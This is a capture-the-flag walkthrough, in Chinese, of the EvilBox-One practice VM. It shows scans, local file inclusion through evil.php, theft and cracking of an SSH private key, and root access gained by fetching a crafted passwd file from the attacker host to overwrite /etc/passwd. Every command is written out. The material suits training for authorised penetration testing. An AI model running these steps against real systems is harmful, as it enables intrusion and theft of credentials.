OSCP实战靶机 | EvilBox-One

kali-linux-2024.2-virtualbox-amd64

Oracle VM VirtualBox 7.0

kali和靶机都选“仅主机（Host-Only）网络”先启动kali，再启动靶机，因为上一台靶机分的是105的ip，所以这次是106kali的IP是192.168.56.101靶机的IP是192.168.56.106

sudo nmap -p 1-65535 192.168.56.106[sudo] password for kali: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-17 02:27 EDTNmap scan report for 192.168.56.106Host is up (0.00012s latency).Not shown: 65533 closed tcp ports (reset)PORT   STATE SERVICE22/tcp open  ssh80/tcp open  httpMAC Address: 08:00:27:E3:CC:F1 (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 16.41 seconds

sudo nmap -p22,80 -sT -A 192.168.56.106 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-17 02:28 EDTNmap scan report for 192.168.56.106Host is up (0.00050s latency).PORT   STATE SERVICE VERSION22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)| ssh-hostkey: |   2048 44:95:50:0b:e4:73:a1:85:11:ca:10:ec:1c:cb:d4:26 (RSA)|   256 27:db:6a:c7:3a:9c:5a:0e:47:ba:8d:81:eb:d6:d6:3c (ECDSA)|_  256 e3:07:56:a9:25:63:d4:ce:39:01:c1:9a:d9:fe:de:64 (ED25519)80/tcp open  http    Apache httpd 2.4.38 ((Debian))|_http-title: Apache2 Debian Default Page: It works|_http-server-header: Apache/2.4.38 (Debian)MAC Address: 08:00:27:E3:CC:F1 (Oracle VirtualBox virtual NIC)Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portDevice type: general purposeRunning: Linux 4.X|5.XOS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5OS details: Linux 4.15 - 5.8Network Distance: 1 hopService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTEHOP RTT     ADDRESS1   0.50 ms 192.168.56.106OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 21.81 seconds

gobuster dir -u http://192.168.56.106 -w /usr/share/wordlists/dirb/common.txt -t 5===============================================================Gobuster v3.6by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url:                     http://192.168.56.106[+] Method:                  GET[+] Threads:                 5[+] Wordlist:                /usr/share/wordlists/dirb/common.txt[+] Negative Status codes:   404[+] User Agent:              gobuster/3.6[+] Timeout:                 10s===============================================================Starting gobuster in directory enumeration mode===============================================================/.hta                 (Status: 403) [Size: 279]/.htpasswd            (Status: 403) [Size: 279]/.htaccess            (Status: 403) [Size: 279]/index.html           (Status: 200) [Size: 10701]/robots.txt           (Status: 200) [Size: 12]/secret               (Status: 301) [Size: 317] [--> http://192.168.56.106/secret/]/server-status        (Status: 403) [Size: 279]Progress: 4614 / 4615 (99.98%)===============================================================Finished===============================================================

gobuster dir -u http://192.168.56.106/secret -w /usr/share/wordlists/dirb/common.txt -t 5     ===============================================================Gobuster v3.6by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url:                     http://192.168.56.106/secret[+] Method:                  GET[+] Threads:                 5[+] Wordlist:                /usr/share/wordlists/dirb/common.txt[+] Negative Status codes:   404[+] User Agent:              gobuster/3.6[+] Timeout:                 10s===============================================================Starting gobuster in directory enumeration mode===============================================================/.htaccess            (Status: 403) [Size: 279]/.htpasswd            (Status: 403) [Size: 279]/.hta                 (Status: 403) [Size: 279]/index.html           (Status: 200) [Size: 4]Progress: 4614 / 4615 (99.98%)===============================================================Finished===============================================================

gobuster dir -u http://192.168.56.106/secret -w /usr/share/wordlists/dirb/common.txt -t 5 -x php,txt.jsp===============================================================Gobuster v3.6by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url:                     http://192.168.56.106/secret[+] Method:                  GET[+] Threads:                 5[+] Wordlist:                /usr/share/wordlists/dirb/common.txt[+] Negative Status codes:   404[+] User Agent:              gobuster/3.6[+] Extensions:              php,txt.jsp[+] Timeout:                 10s===============================================================Starting gobuster in directory enumeration mode===============================================================/.php                 (Status: 403) [Size: 279]/.hta                 (Status: 403) [Size: 279]/.hta.txt.jsp         (Status: 403) [Size: 279]/.htaccess.php        (Status: 403) [Size: 279]/.hta.php             (Status: 403) [Size: 279]/.htaccess            (Status: 403) [Size: 279]/.htaccess.txt.jsp    (Status: 403) [Size: 279]/.htpasswd.txt.jsp    (Status: 403) [Size: 279]/.htpasswd            (Status: 403) [Size: 279]/.htpasswd.php        (Status: 403) [Size: 279]/evil.php             (Status: 200) [Size: 0]/index.html           (Status: 200) [Size: 4]Progress: 13842 / 13845 (99.98%)===============================================================Finished===============================================================

gobuster fuzz -u http://192.168.56.106/secret/evil.php?FUZZ=../../../../../etc/passwd -w /usr/share/wordlists/dirb/common.txt -t 5 | grep -v "Length=0"===============================================================Gobuster v3.6by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url:          http://192.168.56.106/secret/evil.php?FUZZ=../../../../../etc/passwd[+] Method:       GET[+] Threads:      5[+] Wordlist:     /usr/share/wordlists/dirb/common.txt[+] User Agent:   gobuster/3.6[+] Timeout:      10s===============================================================Starting gobuster in fuzzing mode===============================================================Found: [Status=200] [Length=1398] [Word=command] http://192.168.56.106/secret/evil.php?command=../../../../../etc/passwdFound: [Status=400] [Length=301] [Word=Documents and Settings] http://192.168.56.106/secret/evil.php?Documents and Settings=../../../../../etc/passwdFound: [Status=400] [Length=301] [Word=Program Files] http://192.168.56.106/secret/evil.php?Program Files=../../../../../etc/passwdFound: [Status=400] [Length=301] [Word=reports list] http://192.168.56.106/secret/evil.php?reports list=../../../../../etc/passwdProgress: 4614 / 4615 (99.98%)===============================================================Finished===============================================================

curl http://192.168.56.106/secret/evil.php?command=../../../../../etc/passwdroot:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologinbackup:x:34:34:backup:/var/backups:/usr/sbin/nologinlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologingnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologinnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin_apt:x:100:65534::/nonexistent:/usr/sbin/nologinsystemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologinsystemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologinsystemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologinmessagebus:x:104:110::/nonexistent:/usr/sbin/nologinsshd:x:105:65534::/run/sshd:/usr/sbin/nologinmowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bashsystemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin

curl http://192.168.56.106/secret/evil.php?command=php://filter/convert.base64-encode/resource=evil.php | base64 -d  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current                                 Dload  Upload   Total   Spent    Left  Speed100    92  100    92    0     0   3621      0 --:--:-- --:--:-- --:--:--  3680<?php    $filename = $_GET['command'];    include($filename);?>

curl http://192.168.56.106/secret/evil.php?command=../../../../../../../../home/mowree/.ssh/id_rsa   -----BEGIN RSA PRIVATE KEY-----Proc-Type: 4,ENCRYPTEDDEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90EuuQm2CFIe/eZT5pNyQ6+K1Uap/FYWcsEklzONt+x4AO6FmjFmR8RUpwMHurmbRC6hqyoiv8vgpQgQRPYMzJ3QgS9kUCGdgC5+cXlNCST/GKQOS4QMQMUTacjZZ8EJzoeo7+7tCB8Zk/sW7b8c3m4Cz0CmE5mut8ZyuTnB0SAlGAQfZjqsldugHjZ1t17mldb+gzWGBUmKTOLO/gcuAZC+Tj+BoGkb2gneiMA85oJX6y/dqq4Ir10Qom+0tOFsuotb7A9XTubgElslUEm8fGW64kX3x3LtXRsoR12n+krZ6T+IOTzThMWExR1Wxp4Ub/kHtXTzdvDQBbgBf4h08qyCOxGEaVZHKaV/ynGnOv0zhlZ+z163SjppVPK07H4bdLg9SC1omYunvJgunMS0ATC8uAWzoQ5Iz5ka0h+NOofUrVtfJZ/OnhtMKW+M948EgnYzh7Ffq1KlMjZHxnIS3bdcl4MFV0F3Hpx+iDukvyfeeWKuoeUuvzNfVKVPZKqyaJurRqnxYW/fzdJm+8XViMQccgQAaZ+Zb2rVW0gyifsEigxShdaT5PGdJFKKVLS+bD1tHBy6UOhKCn3H8edtXwvZN+9PDGDzUcEpr9xYCLkmH+hcr06ypUtlu9UrePLh/Xs94KATK4joOIW7O8GnPdKBiI+3Hk0qakL1kyYQVBtMjKTyEM8yRcssGZr/MdVnYWmVD5pEdAybKBfBG/xVu2CR378BRKzlJkiyqRjXQLoFMVDz3I30RpjbpfYQs2Dm2M7Mb26wNQW4ff7qe30K/Ixrm7MfkJPzueQlSi94IHXaPvl4vyCoPLW89JzsNDsvG8PhrkWRpPIwpzKdtMPwQbkPu4ykqgKkYYRmVlfX8oeis3C1hCjqvp3Lth0QDI+7ShrFb5w0n0qfDT4o03U1Pun2iqdI4M+iDZUF4S0BD3xA/zp+d98NnGlRqMmJK+StmqRIIk3DRRkvMxxCm12g2DotRUgT2+mgaZ3nq55eqzXRh0U1P5QfhO+V8WzbVzhP6+RMtqgW1L0iAgB4CnTIud6DpXQtR9l//9alrXa+4nWcDW2GoKjljxOKNK8jXs58SnS62LrvcNZVokZjql8Xi7xL0XbEk0gtpItLtX7xAHLFTVZt4UH6csOcwq5vvJAGh69Q/ikz5XmyQ+wDwQEQDzNeOj9zBh1+1zrdmt0m7hI5WnIJakEM2vqCqluN5CEs4u8p1ia+meL0JVlLobfnUgxi3Qzm9SF2pifQdePVU4GXGhIOBUf34bts0iEIDf+qx2CpwxoAe1tMmInlZfR2sKVlIeHIBfHq/hPf2PHvU0cpz7MzfY36x9ufZc5MH2JDT8XKREAJ3S0pMplP/ZcXjRLOlESQXeUQ2yvb61m+zphg0QjWH131gnaBIhVIj1nLnTai99+vYdwe8+8nJq4/WXhkN+VTYXndET2H0fFNTFAqbk2HGy6+6qS/4Q6DVVxTHdp4Dg2QRnRTjp74dQ1NZ7juucvW7DBFE+CK80dkrr9yFyybVUqBwHrmmQVFGLkS2I/8kOVjIjFKkGQ4rNRWKVoo/HaRoI/f2G6tbEiOVclUMT8iutAg8S4VA==-----END RSA PRIVATE KEY-----

chmod 600 id_rsa                                                                                                                                                                                                                                               ssh2john ./id_rsa > hash.txt                                                                                                                                                                                                                                        john --wordlist=./rockyou.txt hash.txt Created directory: /home/kali/.johnUsing default input encoding: UTF-8Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashesCost 2 (iteration count) is 2 for all loaded hashesWill run 2 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statusunicorn          (./id_rsa)   1g 0:00:00:00 DONE (2024-07-17 03:13) 50.00g/s 62400p/s 62400c/s 62400C/s pedro..shirleyUse the "--show" option to display all of the cracked passwords reliablySession completed. ssh [email protected] -i id_rsa 

mowree@EvilBoxOne:~$ lsuser.txtmowree@EvilBoxOne:~$ cat user.txt 56Rbp0soobpzWSVzKh9YOvzGLgtPZQ

cd /tmpwget http://192.168.56.101/linpeas.shchmod +x ./linpeas.sh ./linpeas.sh

╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files                                                                                                                                                         /dev/mqueue                                                                                                                                                                                                                               /dev/shm/etc/passwd/home/mowree......

openssl passwd -1Password: Verifying - Password: $1$PNn5iJ70$RsHGMW9L3NPvjawqMcG411

root:$1$PNn5iJ70$RsHGMW9L3NPvjawqMcG411:0:0:root:/root:/bin/bash

mowree@EvilBoxOne:/tmp$ wget http://192.168.56.101/passwd.txt -O /etc/passwd--2024-07-17 10:21:22--  http://192.168.56.101/passwd.txtConectando con 192.168.56.101:80... conectado.Petición HTTP enviada, esperando respuesta... 200 OKLongitud: 1431 (1,4K) [text/plain]Grabando a: “/etc/passwd”/etc/passwd                                                100%[========================================================================================================================================>]   1,40K  --.-KB/s    en 0s    utime(/etc/passwd): Operación no permitida2024-07-17 10:21:22 (230 MB/s) - “/etc/passwd” guardado [1431/1431]mowree@EvilBoxOne:/tmp$ su rootContraseña: root@EvilBoxOne:/tmp# iduid=0(root) gid=0(root) grupos=0(root)root@EvilBoxOne:/tmp# cat /root/root.txt 36QtXfdJWvdC0VavlPIApUbDlqTsBMroot@EvilBoxOne:/tmp#